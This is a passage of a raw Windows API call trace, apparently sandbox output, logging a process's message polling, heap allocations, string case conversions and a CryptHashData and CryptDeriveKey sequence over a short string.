[0099.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.831] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0099.832] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719b8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0099.833] CharLowerBuffW (in: lpsz="byte[3]", cchLength=0x7 | out: lpsz="byte[3]") returned 0x7 [0099.834] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.835] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 4 [0099.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="888", cchWideChar=4, lpMultiByteStr=0x2a719a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="888", lpUsedDefaultChar=0x0) returned 4 [0099.836] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.836] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0099.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.836] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0099.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.836] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.836] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0099.836] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptHashData", cchWideChar=14, lpMultiByteStr=0x2aa9ec8, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptHashData", lpUsedDefaultChar=0x0) returned 14 [0099.836] CryptHashData (hHash=0x9a3b80, pbData=0x2a717c8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f6fc0 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b28 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9f28 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a68 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b88 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0099.836] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ab8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x14) returned 0x29f7020 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x24) returned 0x2a69700 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e38 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719e8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71aa8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a48 [0099.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ad8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719c8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b58 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f71e0 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d48 [0099.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.837] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cb8 [0099.837] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719a8 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a719c8 [0099.838] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0099.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d60 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ef8 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0099.838] CharUpperBuffW (in: lpsz="SSA4F00A00447", cchLength=0xd | out: lpsz="SSA4F00A00447") returned 0xd [0099.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b88 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b48 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9eb0 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b08 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c70 [0099.838] CharUpperBuffW (in: lpsz="A2300C04232", cchLength=0xb | out: lpsz="A2300C04232") returned 0xb [0099.838] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ab8 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719b8 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dc0 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e80 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71ac8 [0099.838] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c58 [0099.839] CharUpperBuffW (in: lpsz="SSA2300C04232", cchLength=0xd | out: lpsz="SSA2300C04232") returned 0xd [0099.839] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.839] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a18 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e20 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c88 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a78 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9c40 [0099.839] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b58 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71a98 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0099.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xf) returned 0x2aa9e80 [0099.839] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2aa9e80, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0099.839] CryptDeriveKey (in: hProv=0x9bebc0, Algid=0x6601, hBaseData=0x9a3b80, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0x9a4580) returned 1 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x214) returned 0x2a74958 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7100 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71ad8 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9dd8 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9df0 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e50 [0099.839] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a71b78 [0099.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a68 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a38 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b18 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f70a0 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a719d8 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d90 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71af8 [0099.840] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d18 [0099.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71a88 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9cd0 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71b68 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d30 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71b68 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9d30 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9cd0 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9e08 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71a88 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c10 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9c28 | out: hHeap=0x2af0000) returned 1 [0099.931] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a78 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.931] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a78 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.931] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99d0 | out: hHeap=0x2af0000) returned 1 [0099.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e6c0 | out: hHeap=0x2af0000) returned 1 [0099.932] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fe0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a30 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9be0 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71868 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9be0 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9a30 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa99a0 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fe0 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a716e8 | out: hHeap=0x2af0000) returned 1 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9b38 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9be0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b08 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b50 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99d0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ac0 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0099.932] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aa9b38 | out: hHeap=0x2af0000) returned 1 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a30 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c10 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c28 [0099.932] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9a48 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9b38 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a5dfa8 [0099.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a60 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa99a0 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9a78 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9af0 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e08 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9f28 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c70 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ca0 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9c58 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9e20 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ee0 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9e98 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a716e8 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x20) returned 0x2a77d50 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a715e8 [0099.933] CharUpperBuffW (in: lpsz="A4F00A00447", cchLength=0xb | out: lpsz="A4F00A00447") returned 0xb [0099.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77d50 | out: hHeap=0x2af0000) returned 1 [0099.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a715e8 | out: hHeap=0x2af0000) returned 1 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xc) returned 0x2aa9ef8 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x40) returned 0x2a740d0 [0099.933] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a715e8 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71868 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d78 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9ec8 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a71898 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aa9d00 [0099.933] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a71898 | out: hHeap=0x2af0000) returned 1 [0099.933] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x4) returned 0x2a718f8 [0099.933] RtlAllocateHeap 